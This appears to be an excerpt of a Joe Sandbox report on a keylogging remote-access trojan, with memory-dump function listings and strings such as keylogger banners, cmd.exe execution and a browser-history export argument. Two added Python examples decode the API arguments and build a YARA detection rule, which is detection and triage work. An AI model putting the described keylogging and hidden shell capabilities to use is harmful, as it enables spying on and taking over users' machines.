                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                              • String ID: XCG$x~^$>G
                              • API String ID: 2334542088-886960946
                              • Opcode ID: 117f3a8dcb765dec107e638207eed2dfcae5ace0fe68797d76a2064f9764c662
                              • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                              • Opcode Fuzzy Hash: 117f3a8dcb765dec107e638207eed2dfcae5ace0fe68797d76a2064f9764c662
                              • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                              • String ID: /sort "Visit Time" /stext "$8>G
                              • API String ID: 368326130-2663660666
                              • Opcode ID: ee8b26b7837f5fcebf18eb8c7331d6665d09625d2070b162a5bc37d97d6aa574
                              • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                              • Opcode Fuzzy Hash: ee8b26b7837f5fcebf18eb8c7331d6665d09625d2070b162a5bc37d97d6aa574
                              • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                              • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread$LocalTimewsprintf
                              • String ID: Offline Keylogger Started
                              • API String ID: 465354869-4114347211
                              • Opcode ID: f84189ef53ccdab2324cea7e4949fa979c3031c86b7221add979e4ad61b2c385
                              • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                              • Opcode Fuzzy Hash: f84189ef53ccdab2324cea7e4949fa979c3031c86b7221add979e4ad61b2c385
                              • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                              APIs
                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                              • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                              • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread$LocalTime$wsprintf
                              • String ID: Online Keylogger Started
                              • API String ID: 112202259-1258561607
                              • Opcode ID: 6342d03d0c9a2cdc3ce349886319e248d88a10a607891716496075ed72338117
                              • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                              • Opcode Fuzzy Hash: 6342d03d0c9a2cdc3ce349886319e248d88a10a607891716496075ed72338117
                              • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                              APIs
                              • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                              • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                              • __dosmaperr.LIBCMT ref: 0044AAFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID: `@
                              • API String ID: 2583163307-951712118
                              • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                              • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                              • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                              • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                              APIs
                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExistsFilePath
                              • String ID: TUF$alarm.wav$xIG
                              • API String ID: 1174141254-2188790166
                              • Opcode ID: 5ab373a09f9b49e7ca49f4ef29822fbe7d49cf7a1595be203e0675d8e7e95e86
                              • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                              • Opcode Fuzzy Hash: 5ab373a09f9b49e7ca49f4ef29822fbe7d49cf7a1595be203e0675d8e7e95e86
                              • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                              • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                              • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandleObjectSingleWait
                              • String ID: Connection Timeout
                              • API String ID: 2055531096-499159329
                              • Opcode ID: e4aafb68730189f051766cfe717f4579ae2cf6b1a1b95cb5a966786d982b9e87
                              • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                              • Opcode Fuzzy Hash: e4aafb68730189f051766cfe717f4579ae2cf6b1a1b95cb5a966786d982b9e87
                              • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
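The API reference lines in these listings print every 32-bit argument as raw hex: the two OpenProcess calls reached from the window-enumeration routine (00001000 and 00000400), the CreateFileW calls (80000000, share 00000001 or 00000003, disposition 00000003), Sleep(000000FA) and WaitForSingleObject(?,000003E8). The following Python is a worked example added by the editor, not part of the Joe Sandbox report or of any tool it describes: it parses those lines into records and decodes the access masks, sharing modes, creation dispositions and millisecond timeouts using the documented Win32 SDK constant values. The constant tables cover only the APIs seen in these listings, and the SAMPLE input is copied verbatim from the lines above.

```python
"""Parse the "APIs" lines of a Joe Sandbox function listing into records and
decode the argument constants a triager wants to read at a glance.
Added illustration for this page; not Joe Sandbox's own code.  The constant
tables are limited to the APIs that appear in these listings."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One reference line, optionally prefixed by "Part of subcall function XXXXXXXX:",
# e.g.  OpenProcess.KERNEL32(00001000,00000000,?), ref: 0041B395
#       _free.LIBCMT ref: 00443305
_LINE_RE = re.compile(
    r"^\W*(?:Part of subcall function (?P<callee>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
_HEX8 = re.compile(r"^[0-9A-F]{8}$")   # Joe Sandbox prints 32-bit args this way

# (API name, argument index) -> bit-flag names (Win32 SDK values)
BITMASKS = {
    ("OpenProcess", 0): {
        0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
        0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
        0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
        0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    },
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileW", 2): {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE",
                         0x4: "FILE_SHARE_DELETE"},
}
# (API name, argument index) -> enumeration (exact value, not a mask)
ENUMS = {
    ("CreateFileW", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
}
# (API name, argument index) -> delay or timeout in milliseconds
MILLISECONDS = {("Sleep", 0), ("WaitForSingleObject", 1)}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str                      # address of the call site
    args: list = field(default_factory=list)
    callee: Optional[str] = None  # set for "Part of subcall function" lines
    decoded: dict = field(default_factory=dict)   # arg index -> readable value


def _decode_mask(value, table):
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)           # bits the table does not know
    if unknown:
        names.append(f"0x{unknown:X}")
    return "|".join(names) if names else "0"


def decode_args(call):
    out = {}
    for i, raw in enumerate(call.args):
        if not _HEX8.match(raw):            # "?" or a string literal: skip
            continue
        value, key = int(raw, 16), (call.api, i)
        if key in BITMASKS:
            out[i] = _decode_mask(value, BITMASKS[key])
        elif key in ENUMS:
            out[i] = ENUMS[key].get(value, f"0x{value:X}")
        elif key in MILLISECONDS:
            out[i] = f"{value} ms"
    return out


def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        call = ApiCall(m["api"], m["module"], m["ref"], args, m["callee"])
        call.decoded = decode_args(call)
        calls.append(call)
    return calls


def render(calls):
    """One line per call with decoded arguments substituted, for a triage note."""
    lines = []
    for c in calls:
        shown = [c.decoded.get(i, a) for i, a in enumerate(c.args)]
        via = f" (via sub_{c.callee})" if c.callee else ""
        lines.append(f"{c.ref} {c.api}({', '.join(shown)}){via}")
    return lines


# Lines copied from the listings above (subcall prefixes included).
SAMPLE = """\
• GetWindowThreadProcessId.USER32(?,?), ref: 00416768
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
• Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
• _free.LIBCMT ref: 00443305
"""

if __name__ == "__main__":
    print("\n".join(render(parse_api_lines(SAMPLE))))
```

Read against the listings, the decoded output says more than the hex does: the window-enumeration helper opens each owning process with only the query rights it needs (limited first, full query second), the CreateFileW in the keyboard-layout routine opens an existing file read-only, the loop delay is 250 ms and the connection wait before the "Connection Timeout" path is one second.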
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                              • String ID: bad locale name
                              • API String ID: 3628047217-1405518554
                              • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                              • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                              • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                              • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell
                              • String ID: /C $cmd.exe$open
                              • API String ID: 587946157-3896048727
                              • Opcode ID: a499c4d5e5c154c23b09534d8e104b1b0afd7b6871b6321b4072401f19f2a66d
                              • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                              • Opcode Fuzzy Hash: a499c4d5e5c154c23b09534d8e104b1b0afd7b6871b6321b4072401f19f2a66d
                              • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                              APIs
                              • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                              • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                              • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: TerminateThread$HookUnhookWindows
                              • String ID: pth_unenc
                              • API String ID: 3123878439-4028850238
                              • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                              • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                              • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                              • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
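The strings quoted across these listings ("Offline Keylogger Started" and "Online Keylogger Started" next to the three CreateThread calls, "Connection Timeout" next to the one-second WaitForSingleObject, "pth_unenc" in the TerminateThread/UnhookWindowsHookEx teardown routine, the `/sort "Visit Time" /stext "` argument string and "alarm.wav") sit in plaintext in the process image, which is what a triager pivots on first. The following Python is an added example by the editor, not Joe Sandbox or Remcos code: it scans a dump for those markers in both ANSI and UTF-16LE form (several are handed to W-suffixed APIs such as wsprintfW, so the wide form is the one to expect), reports which were found, and emits a YARA rule from the same list. The capability labels in MARKERS are the editor's reading of the surrounding API calls, DEMO_DUMP is constructed for the demo, and the rule name and the "2 of" threshold are arbitrary choices; the marker list is what this one report shows, not a vetted family signature.

```python
"""Triage scan of a process memory dump for the plaintext markers that the
function listings above expose, plus a YARA rule built from the same list.
Added illustration; not Joe Sandbox or Remcos code.  DEMO_DUMP is constructed
for the demo and the capability labels are the editor's interpretation."""

# Strings quoted in the listings above -> what the surrounding calls suggest.
# Several are passed to W-suffixed APIs (wsprintfW, the GetLocalTime caller),
# so they may sit in memory as UTF-16LE; both encodings are searched.
MARKERS = {
    "Offline Keylogger Started": "keylogger banner (offline mode)",
    "Online Keylogger Started": "keylogger banner (online mode)",
    "Connection Timeout": "C2 connection timeout banner",
    "pth_unenc": "tag used in the keyboard-hook teardown routine",
    '/sort "Visit Time" /stext "': "history-export command line (/stext switch)",
    "alarm.wav": "alarm sound file name",
}


def scan_dump(data: bytes):
    """Return (marker, encoding, offset) for every occurrence, sorted by offset."""
    hits = []
    for marker in MARKERS:
        for enc, needle in (("ascii", marker.encode("ascii")),
                            ("wide", marker.encode("utf-16-le"))):
            pos = data.find(needle)
            while pos != -1:
                hits.append((marker, enc, pos))
                pos = data.find(needle, pos + 1)
    return sorted(hits, key=lambda h: h[2])


def capabilities(hits):
    """Distinct capability labels implied by the markers that were found."""
    return sorted({MARKERS[m] for m, _, _ in hits})


def matches(hits, minimum=2):
    """Mirror the YARA condition below: at least `minimum` distinct markers."""
    return len({m for m, _, _ in hits}) >= minimum


def yara_rule(name="remcos_markers_from_report"):
    """Emit a YARA rule: 'ascii wide' covers both encodings, the MZ check keeps
    it to PE images and unpacked dumps, '2 of' avoids firing on one generic
    string such as "Connection Timeout" on its own."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, marker in enumerate(MARKERS):
        esc = marker.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        $s{i} = "{esc}" ascii wide')
    lines += ["    condition:", "        uint16(0) == 0x5A4D and 2 of ($s*)", "}"]
    return "\n".join(lines)


# Constructed stand-in for an unpacked image: a fake MZ header, padding, a wide
# keylogger banner, an ANSI tag and a wide timeout banner, then filler.
DEMO_DUMP = (
    b"MZ" + b"\x00" * 62
    + b"\x90" * 16
    + "Offline Keylogger Started".encode("utf-16-le") + b"\x00\x00"
    + b"pth_unenc\x00"
    + "Connection Timeout".encode("utf-16-le") + b"\x00\x00"
    + b"\xcc" * 8
)

if __name__ == "__main__":
    found = scan_dump(DEMO_DUMP)
    for marker, enc, off in found:
        print(f"{off:08x} {enc:5} {marker!r}")
    print("capabilities:", capabilities(found))
    print("rule would match:", matches(found))
    print(yara_rule())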
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: __alldvrm$_strrchr
                              • String ID:
                              • API String ID: 1036877536-0
                              • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                              • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                              • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                              • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                              • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                              • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                              • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
